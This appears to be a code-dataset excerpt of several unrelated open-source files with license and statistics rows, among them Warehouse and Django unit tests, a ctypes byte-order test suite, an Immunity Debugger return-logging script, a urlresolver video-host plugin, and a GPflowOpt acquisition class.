klnFace = osgDB.readImageFile("KLN89FaceB.tga")
if klnFace is None:
print " Couldn't find texture, quitting."
sys.exit(-1)
# Assign the texture to the image we read from file:
KLN89FaceTexture.setImage(klnFace)
# Textures can be associated with rendering StateSets. The next step is to
# create a StateSet, associate and enable our texture with this state set and
# assign the StateSet to our geometry.
# Create a StateSet with default settings:
stateOne = osg.StateSet()
# Assign texture unit 0 of our StateSet to the texture
# we just created and enable the texture.
stateOne.setTextureAttributeAndModes(0, KLN89FaceTexture, osg.StateAttribute.ON)
# Associate this state set with the Geode that contains
# the pyramid:
pyramidGeode.setStateSet(stateOne)
# The last step is the simulation loop:
viewer = osgViewer.Viewer()
#The final step is to set up and enter a simulation loop.
viewer.setSceneData( root )
viewer.run()
| bsd-3-clause | 5,011,954,014,060,613,000 | 38.242236 | 108 | 0.738841 | false |
alex/warehouse | tests/unit/test_filters.py | 1 | 7152 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib.parse
import jinja2
import packaging.version
import pretend
import pytest
import readme_renderer.rst
import readme_renderer.txt
from warehouse import filters
def test_camo_url():
c_url = filters._camo_url(
"https://camo.example.net/",
"fake key",
"http://example.com/image.jpg",
)
assert c_url == (
"https://camo.example.net/b410d235a3d2fc44b50ccab827e531dece213062/"
"687474703a2f2f6578616d706c652e636f6d2f696d6167652e6a7067"
)
class TestReadmeRender:
def test_can_render(self, monkeypatch):
monkeypatch.setattr(
readme_renderer.rst,
"render",
lambda raw: "rendered",
)
ctx = {
"request": pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
},
),
),
}
result = filters.readme(ctx, "raw thing", format="rst")
assert result == jinja2.Markup("rendered")
def test_cant_render(self, monkeypatch):
monkeypatch.setattr(readme_renderer.rst, "render", lambda raw: None)
monkeypatch.setattr(
readme_renderer.txt, "render", lambda raw: "rendered<br>thing",
)
ctx = {
"request": pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
},
),
),
}
result = filters.readme(ctx, "raw thing", format="rst")
assert result == jinja2.Markup("rendered<br>thing")
def test_renders_camo(self, monkeypatch):
html = "<img src=http://example.com/image.jpg>"
monkeypatch.setattr(readme_renderer.rst, "render", lambda raw: html)
gen_camo_url = pretend.call_recorder(
lambda curl, ckey, url: "https://camo.example.net/image.jpg"
)
monkeypatch.setattr(filters, "_camo_url", gen_camo_url)
ctx = {
"request": pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
},
),
),
}
result = filters.readme(ctx, "raw thing", format="rst")
assert result == jinja2.Markup(
'<img src="https://camo.example.net/image.jpg">'
)
assert gen_camo_url.calls == [
pretend.call(
"https://camo.example.net/",
"fake key",
"http://example.com/image.jpg",
),
]
def test_renders_camo_no_src(self, monkeypatch):
html = "<img>"
monkeypatch.setattr(readme_renderer.rst, "render", lambda raw: html)
gen_camo_url = pretend.call_recorder(
lambda curl, ckey, url: "https://camo.example.net/image.jpg"
)
monkeypatch.setattr(filters, "_camo_url", gen_camo_url)
ctx = {
"request": pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
},
),
),
}
result = filters.readme(ctx, "raw thing", format="rst")
assert result == jinja2.Markup("<img>")
assert gen_camo_url.calls == []
@pytest.mark.parametrize(
("inp", "expected"),
[
(1, "1"),
(999, "999"),
(1234, "1.23k"),
(4304264, "4.3M"),
(7878123132, "7.88G"),
(9999999999999, "10T"),
],
)
def test_shorten_number(inp, expected):
assert filters.shorten_number(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
({"foo": "bar", "left": "right"}, '{"foo":"bar","left":"right"}'),
],
)
def test_tojson(inp, expected):
assert filters.tojson(inp) == expected
def test_urlparse():
inp = "https://google.com/foo/bar?a=b"
expected = urllib.parse.urlparse(inp)
assert filters.urlparse(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
"'python', finance, \"data\", code , test automation",
["python", "finance", "data", "code", "test automation"]
),
(
"'python'; finance; \"data\"; code ; test automation",
["python", "finance", "data", "code", "test automation"]
),
(
"a \"b\" c d 'e'",
["a", "b", "c", "d", "e"]
),
(
" ' ' \" \"",
[]
)
]
)
def test_format_tags(inp, expected):
assert filters.format_tags(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
["Foo :: Bar :: Baz", "Foo :: Bar :: Qux", "Vleep"],
[("Foo", ["Bar :: Baz", "Bar :: Qux"])],
),
(
["Vleep :: Foo", "Foo :: Bar :: Qux", "Foo :: Bar :: Baz"],
[("Foo", ["Bar :: Baz", "Bar :: Qux"]), ("Vleep", ["Foo"])],
),
],
)
def test_format_classifiers(inp, expected):
assert list(filters.format_classifiers(inp).items()) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
["abcdef", "ghijkl"],
False
),
(
["https://github.com/example/test", "https://pypi.io/"],
True
),
(
["abcdef", "https://github.com/example/test"],
True
)
]
)
def test_contains_valid_uris(inp, expected):
assert filters.contains_valid_uris(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
("bdist_dmg", "OSX Disk Image"),
("bdist_dumb", "Dumb Binary"),
("bdist_egg", "Egg"),
("bdist_msi", "Windows MSI Installer"),
("bdist_rpm", "RPM"),
("bdist_wheel", "Wheel"),
("bdist_wininst", "Windows Installer"),
("sdist", "Source"),
("invalid", "invalid"),
],
)
def test_format_package_type(inp, expected):
assert filters.format_package_type(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
("1.0", packaging.version.Version("1.0")),
]
)
def test_parse_version(inp, expected):
assert filters.parse_version(inp) == expected
| apache-2.0 | 4,395,946,780,134,338,600 | 26.6139 | 76 | 0.50755 | false |
mixman/djangodev | tests/regressiontests/localflavor/ca/tests.py | 1 | 3819 | import warnings
from django.contrib.localflavor.ca.forms import (CAPostalCodeField,
CAPhoneNumberField, CAProvinceField, CAProvinceSelect,
CASocialInsuranceNumberField)
from django.test import SimpleTestCase
class CALocalFlavorTests(SimpleTestCase):
def setUp(self):
self.save_warnings_state()
warnings.filterwarnings(
"ignore",
category=RuntimeWarning,
module='django.contrib.localflavor.ca.ca_provinces'
)
def tearDown(self):
self.restore_warnings_state()
def test_CAProvinceSelect(self):
f = CAProvinceSelect()
out = u'''<select name="province">
<option value="AB" selected="selected">Alberta</option>
<option value="BC">British Columbia</option>
<option value="MB">Manitoba</option>
<option value="NB">New Brunswick</option>
<option value="NL">Newfoundland and Labrador</option>
<option value="NT">Northwest Territories</option>
<option value="NS">Nova Scotia</option>
<option value="NU">Nunavut</option>
<option value="ON">Ontario</option>
<option value="PE">Prince Edward Island</option>
<option value="QC">Quebec</option>
<option value="SK">Saskatchewan</option>
<option value="YT">Yukon</option>
</select>'''
self.assertEqual(f.render('province', 'AB'), out)
def test_CAPostalCodeField(self):
error_format = [u'Enter a postal code in the format XXX XXX.']
valid = {
'T2S 2H7': 'T2S 2H7',
'T2S 2W7': 'T2S 2W7',
'T2S 2Z7': 'T2S 2Z7',
'T2Z 2H7': 'T2Z 2H7',
'T2S2H7' : 'T2S 2H7',
't2s 2h7': 'T2S 2H7',
't2s2h7' : 'T2S 2H7',
't2s 2H7': 'T2S 2H7',
' t2s 2H7 ': 'T2S 2H7',
}
invalid = {
'T2S 2H' : error_format,
'2T6 H8I': error_format,
'T2S2H' : error_format,
't2s h8i': error_format,
90210 : error_format,
'W2S 2H3': error_format,
'Z2S 2H3': error_format,
'F2S 2H3': error_format,
'A2S 2D3': error_format,
'A2I 2R3': error_format,
'A2Q 2R3': error_format,
'U2B 2R3': error_format,
'O2B 2R3': error_format,
}
self.assertFieldOutput(CAPostalCodeField, valid, invalid)
def test_CAPhoneNumberField(self):
error_format = [u'Phone numbers must be in XXX-XXX-XXXX format.']
valid = {
'403-555-1212': '403-555-1212',
'4035551212': '403-555-1212',
'403 555-1212': '403-555-1212',
'(403) 555-1212': '403-555-1212',
'403 555 1212': '403-555-1212',
'403.555.1212': '403-555-1212',
'403.555-1212': '403-555-1212',
' (403) 555.1212 ': '403-555-1212',
}
invalid = {
'555-1212': error_format,
'403-55-1212': error_format,
}
self.assertFieldOutput(CAPhoneNumberField, valid, invalid)
def test_CAProvinceField(self):
error_format = [u'Enter a Canadian province or territory.']
valid = {
'ab': 'AB',
'BC': 'BC',
'nova scotia': 'NS',
' manitoba ': 'MB',
}
invalid = {
'T2S 2H7': error_format,
}
self.assertFieldOutput(CAProvinceField, valid, invalid)
def test_CASocialInsuranceField(self):
error_format = [u'Enter a valid Canadian Social Insurance number in XXX-XXX-XXX format.']
valid = {
'046-454-286': '046-454-286',
}
invalid = {
'046-454-287': error_format,
'046 454 286': error_format,
'046-44-286': error_format,
}
self.assertFieldOutput(CASocialInsuranceNumberField, valid, invalid)
| bsd-3-clause | -1,082,681,703,602,119,000 | 33.098214 | 97 | 0.558785 | false |
sbobovyc/GameTools | ImmunityDebugger/collectLoopRets.py | 1 | 2256 | #!/usr/bin/env python
import immlib
from immlib import LogBpHook, BpHook
class ReturnBP(BpHook):
def __init__(self):
BpHook.__init__(self)
def run(self, regs):
imm = immlib.Debugger()
eip = regs["EIP"]
imm.log("bp, EIP is 0x%08X " % eip)
imm.addKnowledge("0x%08X" % eip, eip)
#self.UnHook()
imm.deleteBreakpoint(eip, eip+4)
imm.run()
class ReturnLog(LogBpHook):
def __init__(self):
LogBpHook.__init__(self)
def run(self, regs):
imm = immlib.Debugger()
eip = regs["EIP"]
imm.log("log, EIP is 0x%08X " % eip)
imm.addKnowledge("0x%08X" % eip, eip)
self.UnHook()
imm.deleteBreakpoint(eip, eip+4)
def main(args):
imm = immlib.Debugger()
module = imm.getModule(imm.getDebuggedName())
imm.log("module %s at 0x%08X" % (module.getName(), module.getBase()))
use_log_bp = True
if len(args) > 0 and args[0] == "false":
imm.log("Using non logging bp")
use_log_bp = False
# make sure module is analysed
if not module.isAnalysed():
module.Analyse()
knowledge = imm.listKnowledge()
hooked = 0
not_hooked = 0
for f in imm.getAllFunctions(module.getBase()):
for ret in imm.getFunctionEnd(f):
if "0x%08X" % ret not in knowledge:
#imm.log("function 0x%08X ret at 0x%08X" % (f, ret))
if use_log_bp:
hook = ReturnLog()
hook.add("ReturnLog 0x%08X"%f, ret)
hooked +=1
else:
hook = ReturnBP()
hook.add("ReturnBP 0x%08X"%f, ret)
hooked +=1
                # FastLogHook left disabled: it appears to overwrite the rets, and getFunctionEnd has trouble with it
#fast = immlib.FastLogHook(imm)
#fast.logFunction(ret)
#fast.logRegister("EIP")
#fast.Hook()
else:
not_hooked += 1
imm.log("Hooked %i, skipped %i" % (hooked, not_hooked))
return "Found returns, attached hooks"
| gpl-3.0 | 2,774,366,314,029,570,600 | 29.90411 | 107 | 0.503103 | false |
anhaidgroup/py_stringmatching | py_stringmatching/similarity_measure/jaro.py | 1 | 2435 | from py_stringmatching import utils
from six.moves import xrange
from py_stringmatching.similarity_measure.sequence_similarity_measure import \
SequenceSimilarityMeasure
from py_stringmatching.similarity_measure.cython.cython_jaro import jaro
class Jaro(SequenceSimilarityMeasure):
"""Computes Jaro measure.
The Jaro measure is a type of edit distance, developed mainly to compare short strings,
such as first and last names.
"""
def __init__(self):
super(Jaro, self).__init__()
def get_raw_score(self, string1, string2):
"""Computes the raw Jaro score between two strings.
Args:
string1,string2 (str): Input strings.
Returns:
Jaro similarity score (float).
Raises:
TypeError : If the inputs are not strings or if one of the inputs is None.
Examples:
>>> jaro = Jaro()
>>> jaro.get_raw_score('MARTHA', 'MARHTA')
0.9444444444444445
>>> jaro.get_raw_score('DWAYNE', 'DUANE')
0.8222222222222223
>>> jaro.get_raw_score('DIXON', 'DICKSONX')
0.7666666666666666
"""
# input validations
utils.sim_check_for_none(string1, string2)
# convert input to unicode.
string1 = utils.convert_to_unicode(string1)
string2 = utils.convert_to_unicode(string2)
utils.tok_check_for_string_input(string1, string2)
# if one of the strings is empty return 0
if utils.sim_check_for_empty(string1, string2):
return 0
return jaro(string1, string2)
def get_sim_score(self, string1, string2):
"""Computes the normalized Jaro similarity score between two strings. Simply call get_raw_score.
Args:
string1,string2 (str): Input strings.
Returns:
Normalized Jaro similarity score (float).
Raises:
TypeError : If the inputs are not strings or if one of the inputs is None.
Examples:
>>> jaro = Jaro()
>>> jaro.get_sim_score('MARTHA', 'MARHTA')
0.9444444444444445
>>> jaro.get_sim_score('DWAYNE', 'DUANE')
0.8222222222222223
>>> jaro.get_sim_score('DIXON', 'DICKSONX')
0.7666666666666666
"""
return self.get_raw_score(string1, string2)
| bsd-3-clause | -4,056,580,345,706,609,700 | 30.217949 | 104 | 0.593018 | false |
JeanOlivier/pyHegel | pyHegel/__init__.py | 1 | 2890 | # -*- coding: utf-8 -*-
########################## Copyrights and license ############################
# #
# Copyright 2011-2015 Christian Lupien <[email protected]> #
# #
# This file is part of pyHegel. http://github.com/lupien/pyHegel #
# #
# pyHegel is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the #
# Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# pyHegel is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public #
# License for more details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with pyHegel. If not, see <http://www.gnu.org/licenses/>. #
# #
##############################################################################
from __future__ import absolute_import
# Use version according to option 5 in https://packaging.python.org/en/latest/single_source_version.html
# make sure that new versions numbers compare properly when using
# pkg_resources.parse_version
__version__ = '1.0.0rc2'
__copyright__ = '2011-2015 Christian Lupien'
def start_pyHegel():
""" This is the recommanded way to start pyHegel.
It starts ipython in a standard way (pylab, autocall enabled,...)
and then loads and initializes the pyHegel commands.
    If the python session was started with the command line argument
--console, it will try to start pyHegel in the Console program
that comes with pythonxy. This is windows only.
If you later need access to the commands in a module:
import pyHegel.commands as cmds
cmds.get(somedevice)
or
from pyHegel.commands import *
get(somedevice)
or any other variants you want.
"""
import sys
import os
if os.name == 'nt' and len(sys.argv) == 2 and sys.argv[1] == '--console':
start_console()
else:
from . import main
main.main_start()
def start_console():
from . import win_console_helper
win_console_helper.start_console()
| gpl-3.0 | 6,260,107,342,247,178,000 | 47.166667 | 104 | 0.510035 | false |
dknlght/dkodi | src/script.module.urlresolver/lib/urlresolver/plugins/vevio.py | 1 | 2891 | """
Plugin for UrlResolver
Copyright (C) 2018 jsergio
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from six.moves import urllib_error
import json
from urlresolver.plugins.lib import helpers
from urlresolver import common
from urlresolver.common import i18n
from urlresolver.resolver import UrlResolver, ResolverError
class VevIoResolver(UrlResolver):
name = "vevio"
domains = ["vev.io", "vev.red"]
pattern = r'(?://|\.)(vev\.(?:io|red))/(?:embed/)?([0-9a-zA-Z]+)'
def __init__(self):
self.headers = {'User-Agent': common.SMU_USER_AGENT}
def get_media_url(self, host, media_id):
try:
result = self.__check_auth(media_id)
if not result:
result = self.__auth_ip(media_id)
except ResolverError:
raise
if result:
return helpers.pick_source(helpers.sort_sources_list(result)) + helpers.append_headers(self.headers)
raise ResolverError("Unable to retrieve video")
def __auth_ip(self, media_id):
header = i18n('vevio_auth_header')
line1 = i18n('auth_required')
line2 = i18n('visit_link')
line3 = i18n('click_pair') % 'https://vev.io/pair'
with common.kodi.CountdownDialog(header, line1, line2, line3) as cd:
return cd.start(self.__check_auth, [media_id])
def __check_auth(self, media_id):
common.logger.log('Checking Auth: %s' % media_id)
url = self.get_url(media_id)
try:
js_result = json.loads(self.net.http_GET(url, headers=self.headers).content)
except ValueError:
raise ResolverError('Unusable Authorization Response')
except urllib_error.HTTPError as e:
if e.code == 400 or e.code == 401:
js_result = {}
else:
raise
common.logger.log('Auth Result: %s' % js_result)
if js_result.get('qualities', {}):
return [(qual.get('size')[1], qual.get('src')) for qual in js_result.get('qualities')]
else:
return []
def get_url(self, media_id, host='vev.io'):
return self._default_get_url(host, media_id, template='https://{host}/api/pair/{media_id}')
@classmethod
def isPopup(self):
return True
| gpl-2.0 | -3,188,007,391,110,179,000 | 35.1375 | 112 | 0.628156 | false |
DMS-Aus/Roam | src/roam/utils.py | 1 | 3007 | import faulthandler
import time
import logging
import os
import sys
import getpass
from logging import handlers
from qgis.PyQt import uic
import gdal
logger = logging.getLogger("roam")
log = logger.debug
debug = logger.debug
info = logger.info
warning = logger.warning
error = logger.error
critical = logger.critical
exception = logger.exception
def setup_logging(approot, config=None):
"""
Setup the roam logger relative to the given approot folder.
:param approot: The folder to create the log folder in.
"""
if config is None:
config = {"loglevel": "INFO"}
try:
logpath = os.path.join(os.environ['ROAM_APPPATH'], 'log')
except KeyError:
logpath = os.path.join(approot, 'log')
print("Logging into: {}".format(logpath))
if not os.path.exists(logpath):
os.makedirs(logpath)
LOG_FILENAME = os.path.join(logpath, "{}_roam.log".format(getpass.getuser()))
log_format = '%(levelname)s - %(asctime)s - %(module)s-%(funcName)s:%(lineno)d - %(message)s'
console_format = '%(levelname)s %(module)s-%(funcName)s:%(lineno)d - %(message)s'
formater = logging.Formatter(log_format)
console_formater = logging.Formatter(console_format)
filehandler = handlers.RotatingFileHandler(LOG_FILENAME,
mode='at',
maxBytes=1000000,
backupCount=5)
levelname = config.get("loglevel", "INFO")
level = logging.getLevelName(levelname)
filehandler.setLevel(level)
filehandler.setFormatter(formater)
stream = logging.StreamHandler(stream=sys.stdout)
stream.setLevel(logging.DEBUG)
stream.setFormatter(console_formater)
logger.handlers = []
logger.addHandler(stream)
logger.addHandler(filehandler)
logger.setLevel(logging.DEBUG)
uic.uiparser.logger.setLevel(logging.INFO)
uic.properties.logger.setLevel(logging.INFO)
if levelname == "DEBUG":
gdal.SetConfigOption("CPL_LOG", os.path.join(logpath, "gdallog.log"))
gdal.SetConfigOption("CPL_DEBUG", "ON")
else:
gdal.SetConfigOption("CPL_LOG", "")
gdal.SetConfigOption("CPL_DEBUG", "OFF")
faulthandler.enable(file=open(os.path.join(logpath, "crashlog.log"), 'w'))
class Timer():
def __init__(self, message="", logging=log):
self.message = message
self.logging = logging
def __enter__(self):
self.start = time.time()
def __exit__(self, *args):
message = self.message + " " + str(time.time() - self.start)
self.logging(message)
def timeit(method):
def wrapper(*args, **kwargs):
ts = time.time()
result = method(*args, **kwargs)
th = time.time()
message = "%r %2.2f seconds " % (method.__name__, th - ts)
info(message)
return result
return wrapper
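# Illustrative usage of Timer and timeit (added note; load_project and
# render_map are hypothetical):
#   with Timer("load project", logging=info):
#       load_project()
#   @timeit
#   def render_map():
#       ...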
def _pluralstring(text='', num=0):
return "%d %s%s" % (num, text, "s"[num == 1:])
| gpl-2.0 | -3,913,994,386,383,318,500 | 27.638095 | 97 | 0.621882 | false |
Jeff-Tian/mybnb | Python27/Lib/ctypes/test/test_byteswap.py | 2 | 11120 | import sys, unittest, struct, math, ctypes
from binascii import hexlify
from ctypes import *
def bin(s):
return hexlify(memoryview(s)).upper()
# Each *simple* type that supports different byte orders has an
# __ctype_be__ attribute that specifies the same type in BIG ENDIAN
# byte order, and a __ctype_le__ attribute that is the same type in
# LITTLE ENDIAN byte order.
#
# For Structures and Unions, these types are created on demand.
class Test(unittest.TestCase):
@unittest.skip('test disabled')
def test_X(self):
print >> sys.stderr, sys.byteorder
for i in range(32):
bits = BITS()
setattr(bits, "i%s" % i, 1)
dump(bits)
def test_endian_short(self):
if sys.byteorder == "little":
self.assertIs(c_short.__ctype_le__, c_short)
self.assertIs(c_short.__ctype_be__.__ctype_le__, c_short)
else:
self.assertIs(c_short.__ctype_be__, c_short)
self.assertIs(c_short.__ctype_le__.__ctype_be__, c_short)
s = c_short.__ctype_be__(0x1234)
self.assertEqual(bin(struct.pack(">h", 0x1234)), "1234")
self.assertEqual(bin(s), "1234")
self.assertEqual(s.value, 0x1234)
s = c_short.__ctype_le__(0x1234)
self.assertEqual(bin(struct.pack("<h", 0x1234)), "3412")
self.assertEqual(bin(s), "3412")
self.assertEqual(s.value, 0x1234)
s = c_ushort.__ctype_be__(0x1234)
self.assertEqual(bin(struct.pack(">h", 0x1234)), "1234")
self.assertEqual(bin(s), "1234")
self.assertEqual(s.value, 0x1234)
s = c_ushort.__ctype_le__(0x1234)
self.assertEqual(bin(struct.pack("<h", 0x1234)), "3412")
self.assertEqual(bin(s), "3412")
self.assertEqual(s.value, 0x1234)
def test_endian_int(self):
if sys.byteorder == "little":
self.assertIs(c_int.__ctype_le__, c_int)
self.assertIs(c_int.__ctype_be__.__ctype_le__, c_int)
else:
self.assertIs(c_int.__ctype_be__, c_int)
self.assertIs(c_int.__ctype_le__.__ctype_be__, c_int)
s = c_int.__ctype_be__(0x12345678)
self.assertEqual(bin(struct.pack(">i", 0x12345678)), "12345678")
self.assertEqual(bin(s), "12345678")
self.assertEqual(s.value, 0x12345678)
s = c_int.__ctype_le__(0x12345678)
self.assertEqual(bin(struct.pack("<i", 0x12345678)), "78563412")
self.assertEqual(bin(s), "78563412")
self.assertEqual(s.value, 0x12345678)
s = c_uint.__ctype_be__(0x12345678)
self.assertEqual(bin(struct.pack(">I", 0x12345678)), "12345678")
self.assertEqual(bin(s), "12345678")
self.assertEqual(s.value, 0x12345678)
s = c_uint.__ctype_le__(0x12345678)
self.assertEqual(bin(struct.pack("<I", 0x12345678)), "78563412")
self.assertEqual(bin(s), "78563412")
self.assertEqual(s.value, 0x12345678)
def test_endian_longlong(self):
if sys.byteorder == "little":
self.assertIs(c_longlong.__ctype_le__, c_longlong)
self.assertIs(c_longlong.__ctype_be__.__ctype_le__, c_longlong)
else:
self.assertIs(c_longlong.__ctype_be__, c_longlong)
self.assertIs(c_longlong.__ctype_le__.__ctype_be__, c_longlong)
s = c_longlong.__ctype_be__(0x1234567890ABCDEF)
self.assertEqual(bin(struct.pack(">q", 0x1234567890ABCDEF)), "1234567890ABCDEF")
self.assertEqual(bin(s), "1234567890ABCDEF")
self.assertEqual(s.value, 0x1234567890ABCDEF)
s = c_longlong.__ctype_le__(0x1234567890ABCDEF)
self.assertEqual(bin(struct.pack("<q", 0x1234567890ABCDEF)), "EFCDAB9078563412")
self.assertEqual(bin(s), "EFCDAB9078563412")
self.assertEqual(s.value, 0x1234567890ABCDEF)
s = c_ulonglong.__ctype_be__(0x1234567890ABCDEF)
self.assertEqual(bin(struct.pack(">Q", 0x1234567890ABCDEF)), "1234567890ABCDEF")
self.assertEqual(bin(s), "1234567890ABCDEF")
self.assertEqual(s.value, 0x1234567890ABCDEF)
s = c_ulonglong.__ctype_le__(0x1234567890ABCDEF)
self.assertEqual(bin(struct.pack("<Q", 0x1234567890ABCDEF)), "EFCDAB9078563412")
self.assertEqual(bin(s), "EFCDAB9078563412")
self.assertEqual(s.value, 0x1234567890ABCDEF)
def test_endian_float(self):
if sys.byteorder == "little":
self.assertIs(c_float.__ctype_le__, c_float)
self.assertIs(c_float.__ctype_be__.__ctype_le__, c_float)
else:
self.assertIs(c_float.__ctype_be__, c_float)
self.assertIs(c_float.__ctype_le__.__ctype_be__, c_float)
s = c_float(math.pi)
self.assertEqual(bin(struct.pack("f", math.pi)), bin(s))
# Hm, what's the precision of a float compared to a double?
self.assertAlmostEqual(s.value, math.pi, 6)
s = c_float.__ctype_le__(math.pi)
self.assertAlmostEqual(s.value, math.pi, 6)
self.assertEqual(bin(struct.pack("<f", math.pi)), bin(s))
s = c_float.__ctype_be__(math.pi)
self.assertAlmostEqual(s.value, math.pi, 6)
self.assertEqual(bin(struct.pack(">f", math.pi)), bin(s))
def test_endian_double(self):
if sys.byteorder == "little":
self.assertIs(c_double.__ctype_le__, c_double)
self.assertIs(c_double.__ctype_be__.__ctype_le__, c_double)
else:
self.assertIs(c_double.__ctype_be__, c_double)
self.assertIs(c_double.__ctype_le__.__ctype_be__, c_double)
s = c_double(math.pi)
self.assertEqual(s.value, math.pi)
self.assertEqual(bin(struct.pack("d", math.pi)), bin(s))
s = c_double.__ctype_le__(math.pi)
self.assertEqual(s.value, math.pi)
self.assertEqual(bin(struct.pack("<d", math.pi)), bin(s))
s = c_double.__ctype_be__(math.pi)
self.assertEqual(s.value, math.pi)
self.assertEqual(bin(struct.pack(">d", math.pi)), bin(s))
def test_endian_other(self):
self.assertIs(c_byte.__ctype_le__, c_byte)
self.assertIs(c_byte.__ctype_be__, c_byte)
self.assertIs(c_ubyte.__ctype_le__, c_ubyte)
self.assertIs(c_ubyte.__ctype_be__, c_ubyte)
self.assertIs(c_char.__ctype_le__, c_char)
self.assertIs(c_char.__ctype_be__, c_char)
def test_struct_fields_1(self):
if sys.byteorder == "little":
base = BigEndianStructure
else:
base = LittleEndianStructure
class T(base):
pass
_fields_ = [("a", c_ubyte),
("b", c_byte),
("c", c_short),
("d", c_ushort),
("e", c_int),
("f", c_uint),
("g", c_long),
("h", c_ulong),
("i", c_longlong),
("k", c_ulonglong),
("l", c_float),
("m", c_double),
("n", c_char),
("b1", c_byte, 3),
("b2", c_byte, 3),
("b3", c_byte, 2),
("a", c_int * 3 * 3 * 3)]
T._fields_ = _fields_
# these fields do not support different byte order:
for typ in c_wchar, c_void_p, POINTER(c_int):
_fields_.append(("x", typ))
class T(base):
pass
self.assertRaises(TypeError, setattr, T, "_fields_", [("x", typ)])
def test_struct_struct(self):
# nested structures with different byteorders
# create nested structures with given byteorders and set memory to data
for nested, data in (
(BigEndianStructure, b'\0\0\0\1\0\0\0\2'),
(LittleEndianStructure, b'\1\0\0\0\2\0\0\0'),
):
for parent in (
BigEndianStructure,
LittleEndianStructure,
Structure,
):
class NestedStructure(nested):
_fields_ = [("x", c_uint32),
("y", c_uint32)]
class TestStructure(parent):
_fields_ = [("point", NestedStructure)]
self.assertEqual(len(data), sizeof(TestStructure))
ptr = POINTER(TestStructure)
s = cast(data, ptr)[0]
del ctypes._pointer_type_cache[TestStructure]
self.assertEqual(s.point.x, 1)
self.assertEqual(s.point.y, 2)
def test_struct_fields_2(self):
# standard packing in struct uses no alignment.
# So, we have to align using pad bytes.
#
# Unaligned accesses will crash Python (on those platforms that
# don't allow it, like sparc solaris).
if sys.byteorder == "little":
base = BigEndianStructure
fmt = ">bxhid"
else:
base = LittleEndianStructure
fmt = "<bxhid"
class S(base):
_fields_ = [("b", c_byte),
("h", c_short),
("i", c_int),
("d", c_double)]
s1 = S(0x12, 0x1234, 0x12345678, 3.14)
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.assertEqual(bin(s1), bin(s2))
def test_unaligned_nonnative_struct_fields(self):
if sys.byteorder == "little":
base = BigEndianStructure
fmt = ">b h xi xd"
else:
base = LittleEndianStructure
fmt = "<b h xi xd"
class S(base):
_pack_ = 1
_fields_ = [("b", c_byte),
("h", c_short),
("_1", c_byte),
("i", c_int),
("_2", c_byte),
("d", c_double)]
s1 = S()
s1.b = 0x12
s1.h = 0x1234
s1.i = 0x12345678
s1.d = 3.14
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.assertEqual(bin(s1), bin(s2))
def test_unaligned_native_struct_fields(self):
if sys.byteorder == "little":
fmt = "<b h xi xd"
else:
fmt = ">b h xi xd"
class S(Structure):
_pack_ = 1
_fields_ = [("b", c_byte),
("h", c_short),
("_1", c_byte),
("i", c_int),
("_2", c_byte),
("d", c_double)]
s1 = S()
s1.b = 0x12
s1.h = 0x1234
s1.i = 0x12345678
s1.d = 3.14
s2 = struct.pack(fmt, 0x12, 0x1234, 0x12345678, 3.14)
self.assertEqual(bin(s1), bin(s2))
if __name__ == "__main__":
unittest.main()
| apache-2.0 | 3,056,722,733,219,436,000 | 35.694915 | 88 | 0.511331 | false |
GPflow/GPflowOpt | gpflowopt/acquisition/pof.py | 1 | 3594 | # Copyright 2017 Joachim van der Herten
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .acquisition import Acquisition
from gpflow import settings
import numpy as np
import tensorflow as tf
float_type = settings.dtypes.float_type
stability = settings.numerics.jitter_level
class ProbabilityOfFeasibility(Acquisition):
"""
Probability of Feasibility acquisition function for sampling feasible regions. Standard acquisition function for
Bayesian Optimization with black-box expensive constraints.
Key reference:
::
@article{Schonlau:1997,
title={Computer experiments and global optimization},
author={Schonlau, Matthias},
year={1997},
publisher={University of Waterloo}
}
The acquisition function measures the probability of the latent function
being smaller than a threshold for a candidate point.
.. math::
\\alpha(\\mathbf x_{\\star}) = \\int_{-\\infty}^{0} \\, p(f_{\\star}\\,|\\, \\mathbf x, \\mathbf y, \\mathbf x_{\\star} ) \\, d f_{\\star}
"""
def __init__(self, model, threshold=0.0, minimum_pof=0.5):
"""
:param model: GPflow model (single output) representing our belief of the constraint
